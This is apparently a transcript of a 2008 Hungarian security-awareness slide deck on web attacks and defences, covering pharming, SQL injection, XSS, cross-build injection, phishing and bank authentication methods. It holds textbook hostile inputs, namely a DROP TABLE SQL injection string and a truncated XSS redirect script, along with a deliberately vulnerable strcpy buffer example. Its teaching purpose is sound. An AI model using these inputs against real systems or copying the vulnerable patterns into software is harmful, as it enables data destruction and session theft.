Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft.

Átírás

1 Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. Cardinal Kft., Gyimesi István

2 Hova fejlődött az Internet az elmúlt 10 évben? Kommunkációs protokollok A web nyelve Biztonsági kockázatok Leggyakoribb támadási módok Védekezési lehetőségek Felvilágosítás fontossága Cardinal Kft., Gyimesi István

3 Egy kis Internet történelem - kommunikáció TCP IPv4 IPv6 HTTP1.1? HTTP1.0 Cardinal Kft., Gyimesi István

4 Egy kis Internet történelem a web nyelve ~ SGML HTML JavaScript HTML4 XHTML? DOM CSS XML Cardinal Kft., Gyimesi István

5 Egy kis Internet történelem a web nyelve 2003 körül: DHTML (Dynamic HTML) XHTML oldalak DOM alapú manipulálása Használt szabványok: HTML CSS JavaScript DOM Cardinal Kft., Gyimesi István

6 Egy kis Internet történelem a web nyelve 2003 körül: DHTML (Dynamic HTML) XHTML oldalak DOM alapú manipulálása Használt szabványok: HTML 1991 CSS 1996 JavaScript 1995 DOM 1998 Cardinal Kft., Gyimesi István

7 Egy kis Internet történelem a web nyelve 2005: AJAX (Asyncronous JavaScript And XML) Desktop alkalmazás-szerűbb web alkalmazások Használt szabványok: HTTP XML CSS JavaScript DOM Cardinal Kft., Gyimesi István

8 Egy kis Internet történelem a web nyelve 2005: AJAX (Asyncronous JavaScript And XML) Desktop alkalmazás-szerűbb web alkalmazások Használt szabványok: HTTP 1996 XML 1998 CSS 1996 JavaScript 1995 DOM 1998 Cardinal Kft., Gyimesi István

9 Lassan 2008-at írunk... Az Internet elavult, akadályozza a fejlődést. A böngészők még mindig különböző mértékben támogatják a szabványokat. e-megoldásokat erőszakolunk bele webservice e-government e-commerce e-business e-banking Cardinal Kft., Gyimesi István

10 Lassan 2008-at írunk... a HTTP csak kérés-válasz alapú kommunikációt biztosít nincs sessionmanagement (a cookie nem jó megoldás!) gyenge a user interface eltérően működő böngészők elégtelen biztonsági eszközök webservice Applet? A Microsoft ellehetetlenítette. Flash? A világ nem tekinti alkalmazásfejlesztő-eszköznek e-government e-commerce e-business e-banking Cardinal Kft., Gyimesi István

11 Nagyobb üzlet, mint a drogkereskedelem forrás: Ellopott adatok kereskedelme (bankszámla: $30-$400, hitelkártya adatok: $5, -jelszavak $1- $300, -címek: $2-$4/MByte) forrás: Távirányított zombihálózatok kiépítése (szervezett támadások, harc a zombihálózatok között) Két kitalált internet banking oldal 8 hét alatt több, mint húszezer támadást kapott forrás: Cardinal Kft., Gyimesi István

12 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

13 Biztonsági rések kihasználása (exploit-ok) Már nem unatkozó egyetemisták írnak vírusokat! Elterjedtek a többrétegű támadások. A cél adatok (pl. -címek) gyűjtése és botnet hálózatok kiépítése! A Storm féreg becslések szerint 2 milliós botnet hálózatot hozott létre. spam-ek küldése (összes levelezés 66%-a spam, és növekszik) DoS támadások szuperszámítógépeket meghaladó számítási kapacitás Cardinal Kft., Gyimesi István

14 És akkor a kínaiak... A céges helyett saját számítógépeik elé ülnek. Képzetlen felhasználók, nem foglalkoznak a biztonsággal. Rengeteg gép fertőződik meg egyszerre. (2007. október 1. és 6. között mintegy egymillió) Jelenleg a lakosság elenyésző hányada internetezik. (Vidéken pl. csak 5%) Félévente 15 millióval több internetező. (XI. ötéves terv: telefon mellé internet is jár) forrás: Cardinal Kft., Gyimesi István

15 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

16 A kliensoldali vizsgálat nem ér semmit! Cardinal Kft., Gyimesi István

17 A kliensoldali vizsgálat nem ér semmit! Cardinal Kft., Gyimesi István

18 A kliensoldali vizsgálat nem ér semmit! Nem szabad az input hosszában, tartalmában megbízni. A combo-ból is tetszőleges adat jöhet. A readonly mezők is változtathatók. <input name= username maxlength= int main(void) { char name[20]; } strcpy(name, getfield( username ); Cardinal Kft., Gyimesi István

19 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

20 Pharming DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. Vírus segítségével az operációs rendszer hosts file-ját, Local Network Routerek DNS beállításait, WiFi routerek DNS beállításait írja át. Cardinal Kft., Gyimesi István

21 Pharming DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. Vírus segítségével az operációs rendszer hosts file-ját, Local Network Routerek DNS beállításait, WiFi routerek DNS beállításait írja át. Cardinal Kft., Gyimesi István

22 Pharming A tanúsítványok érvényesek maradnak! Man-in-the-middle jellegű támadásokhoz vezet. Védekezés: vírusvédelem, tűzfalak routerek default jelszavainak módosítása WiFi hálózatok védelme Cardinal Kft., Gyimesi István

23 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

24 SQL injection Az SQL szöveges parancsformátum. Az alkalmazásoknak ilyen parancsokat kell összeállítani. Megfelelő inputtal támadni lehet az alkalmazást. statement := select * from users where name = ' + username + ' ; ha username értéke: a' or 't' = 't select * from users where name = 'a' or 't' = 't' de username lehet akár: a'; DROP TABLE users; -- select * from users where name = 'a'; DROP TABLE users; --'; Cardinal Kft., Gyimesi István

25 SQL injection where megváltoztatása más parancs beszúrása függvényhívás beszúrása adatbáziskezelő hibáinak kiaknázása Cardinal Kft., Gyimesi István

26 SQL injection Az oktatási anyagokban is fel kell hívni a figyelmet erre! Forrás: Programming ASP.NET (O'Reilly) Cardinal Kft., Gyimesi István

27 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

28 XSS: Cross-site scripting a támadó javascript kódot küld el bemenetként ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál session azonosító ellopása input adatok elküldése egy másik szerverre <input type= text name= comment /> form input: <script>window.location=' echo <P id= comment > echo $username echo </P> Cardinal Kft., Gyimesi István

29 XSS: Cross-site scripting a támadó javascript kódot küld el bemenetként ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál session azonosító ellopása input adatok elküldése egy másik szerverre eredmény: <P id= comment > <script>window.location=' </P> Cardinal Kft., Gyimesi István

30 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

31 XBI: Cross-build injection trójai kód elhelyezése nyílt forráskódú programokban fejlesztőeszközök on-line töltik le a szükséges komponenseket a trójai így számos szoftverben elterjed pharminggal is lehet kombinálni ftp.openbsd.org <dependency> <get src= ftp.openbsd.org/openssl.jar /> </dependency> Fejlesztőgép: dev@/source>build pharming Például: OpenSSL 3.4p1 trójai (2002., ftp.openssh.com feltörése, a támadó a kódban portot nyitott az internet felé) SendMail trójai (2002., ftp.sendmail.org feltörése) Cardinal Kft., Gyimesi István

32 Védekezés webes alkalmazásokban Input ellenőrzése minden esetben. (hossz, tartalom, escape-elések) Ha kliensoldalon szűrök, nem szűrök semmit. SQL utasításokat ne sztringekből fűzzük össze. (használjunk paramétereket) Minimális jogosultsággal fusson a webes alkalmazás. Csak a legszükségesebb komponensek legyenek beépítve. Kimenő oldal vizsgálata, szűrése. Felhasználók többszintű autentikációja, hitelesítés, többszintű naplózás. Jelszavak kódolt tárolása, belső kommunkáció titkosítása. (A banki támadások 80%-a belüről jön!) Cardinal Kft., Gyimesi István

33 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

34 Phishing adathalász levelek december: BB, ERSTE, CIB, Raiffeisen, Szigetvári Tksz. cél: minél több mail megy ki, arányaiban annál több felhasználó esik áldozatul erre is jók a botnet hálózatok! vége: készpénz küldése küldföldre So long and thanks for all the phish! Cardinal Kft., Gyimesi István

35 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

36 Whaling nagy halakat keresnek meg vele cél: kevés, de jól célzott adatkérő levél elküldése Cardinal Kft., Gyimesi István

37 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István

38 Social engineering nem feltétlenül az Interneten keresztül történik emberek hiszékenységének, segítőkészségének kihasználása pl.: nigériai levelek bizonyos szempontból a phishing és a whaling is ide tartozik Cardinal Kft., Gyimesi István

39 Hitelesítési módok A hitelesítéssel valószínűsítjuk (!), hogy a vonal túloldalán az adott személy van. Elterjedt hitelesítési módok: Aláírási jelszó TAN-kód Chipkártya Hitelesítő token SMS jelszó Cardinal Kft., Gyimesi István

40 TAN-kód egyszer használatos kódok jelszavas kiegészítő védelem kell hozzá már öt éve is elavultnak tűnt, de az ügyfelek még mindig használják TAN-kód tábla Felhasználó: Kiss János Cardinal Kft., Gyimesi István

41 Token fizikailag független eszköz kódokat generálnak ha nincs PIN-kód, kiegészítő jelszavas védelem kell Cardinal Kft., Gyimesi István

42 Chipkártya legerősebb biztonság nem terjedt el eléggé olvasót, meghajtót telepíteni kell elveszik a mobilitás Cardinal Kft., Gyimesi István

43 SMS jelszó Magyarország vezető első: Konzumbank (2002.) egyszer használatos, időkorlátos kódok két független csatornát használ, ezeket egyszerre kell támadni Cardinal Kft., Gyimesi István

44 A tudás hatalom! Az emberek nincsenek tisztában az Internet lehetőségeivel, korlátaival, veszélyeivel. A biztonságos internetezésre is meg kell tanítani a felhasználókat. Céges környezetben kiemelten nagy érték az információ, és a biztonság-tudatosság. Otthoni WiFi kapcsolatok védelme. Bluetooth eszközök védelme. Etikus hacker tanfolyamok. És vigyázzunk az ünnepnapokon...! Cardinal Kft., Gyimesi István